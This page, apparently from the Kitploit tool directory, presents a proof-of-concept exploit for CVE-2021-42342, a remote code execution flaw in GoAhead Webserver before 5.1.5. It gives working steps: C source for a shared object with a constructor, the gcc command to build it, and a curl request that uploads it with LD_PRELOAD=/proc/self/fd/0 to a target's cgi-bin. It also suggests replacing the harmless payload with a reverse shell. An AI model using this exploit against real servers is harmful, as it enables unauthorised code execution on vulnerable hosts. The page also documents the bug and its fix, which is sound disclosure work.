Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
goahead-webserver-pre-5.1.5-RCE-PoC-CVE-2021-42342- — A small PoC for the recent RCE found in the Goahead Webserver prior to version 5.1.5. | Kitploit
Tools/GitHubGitHub/kimusan/goahead-webserver-pre-5.1.5-rce-poc-cve-2021-42342-
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubkimusan/goahead-webserver-pre-5.1.5-rce-poc-cve-2021-42342-

goahead-webserver-pre-5.1.5-RCE-PoC-CVE-2021-42342-

A small PoC for the recent RCE found in the Goahead Webserver prior to version 5.1.5.

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
View Repository
2344 years agoReviewed by Kitploit

Goahead webserver (pre v5.1.5) RCE PoC (CVE-2021-42342)

A recent bug in Goahead Webserver was discovered by William Bowling which leads to RCE on the exploited server.

The issue exists prior to version 5.1.5 which, according to Shodan covers around 2.8mio servers on the internet.
A CVS is available now [https://nvd.nist.gov/vuln/detail/CVE-2021-42342]

The RCE is caused by the the fact that if the file upload filter is enabled, then the user can upload files and at the same time set user form variabled.

These variabled ends up as being OS environment variables. This is normally not a problem, as in normal form upload cases, the env variables will get prefixed with CGI_ (default). If, however the file upload filter is enabled, then an error in the code causes this prefix to be left out = instant RCE via env variables + file.

Creating simple shared object

The following will just prints "Hellow World" on the remote server but could be anything really:

root@kitploit:~
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
static void before_main(void) __attribute__((constructor));

static void before_main(void)
{
    write(1, "Hello World!\n", 14);
}

Compile with:

root@kitploit:~
gcc -fPIC -shared -o poc.so poc.c -nostartfiles

Exploiting the server

now we are ready to send our file to the server. This can be done using curl:

root@kitploit:~
curl -X POST  http://[TARGET]/cgi-bin/ -F "LD_PRELOAD=/proc/self/fd/0" -F file='@poc.so;encoder=base64'

change [TARGET] to the domain/ip of the target server.

You will probably see an error from the server, but try with another shared object that e.g. calls back to you with a nice shell 👍

Fix

A fix is out with goahead 5.1.5 here: [https://github.com/embedthis/goahead/issues/305]

Credits

The issue was initially found by Willian Bowling from Perfect Blue CTF team. During pbCTF 2021, a challange was the, at that time, existing version (5.1.4) of goahead server, and togetther with Kalmarunionen CTF Team we came across the same 0day issue in the code (yet to be disclosed to the authors).

Download Tool